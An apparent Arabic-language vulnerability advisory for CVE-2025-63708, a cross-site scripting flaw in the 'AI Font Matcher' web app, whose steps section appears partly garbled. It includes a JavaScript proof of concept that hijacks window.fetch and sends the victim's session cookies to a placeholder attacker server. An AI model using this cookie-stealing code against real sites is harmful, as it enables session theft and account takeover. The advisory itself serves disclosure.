
معرّف CVE: CVE-2025-63708
تاريخ الإسناد: 11-12-2025
نوع المشكلة: CWE-79 (Cross-Site Scripting)
المنتج المتأثر: “AI Font Matcher” (نُشر في 2025-10-10، nid=18425)
صفحة المنتج: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
تاريخ الاكتشاف: 2025-10-11
الباحث: Dylan Davis
يعالج التطبيق البيانات القادمة من طلب webfonts دون تعقيم أسماء عائلات الخطوط. يمكن للمهاجم الذي يتحكم في هذه الاستجابة أو يعترضها حقن JavaScript يتم تنفيذها في سياق الصفحة، مما يتيح سرقة ملفات تعريف الارتباط الخاصة بالجلسة والاستيلاء على الحساب.
يوضح هذا الـ PoC تنفيذ التعليمات البرمجية عن طريق اعتراض window.fetch وإرجاع حمولة Web Fonts خاضعة للتحكم.
poc.js).webfonts؛ ولاحظ ظهور alert(1).window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
const url = (typeof input === 'string') ? input : input?.url;
if (url && url.includes('webfonts')) {
// Exfiltrate cookie to your server
fetch('http://[your-ip]:8001/steal?cookie=' +
encodeURIComponent(document.cookie))
.catch(e => console.log('Exfil failed:', e));
return new Response(JSON.stringify({
kind: "webfonts#webfontList",
items: [{ family: "Playfair Display", category: "serif" }]
}), {
status: 200,
headers: {'Content-Type': 'application/json'}
});
}
return window.__origFetch.apply(this, arguments);
};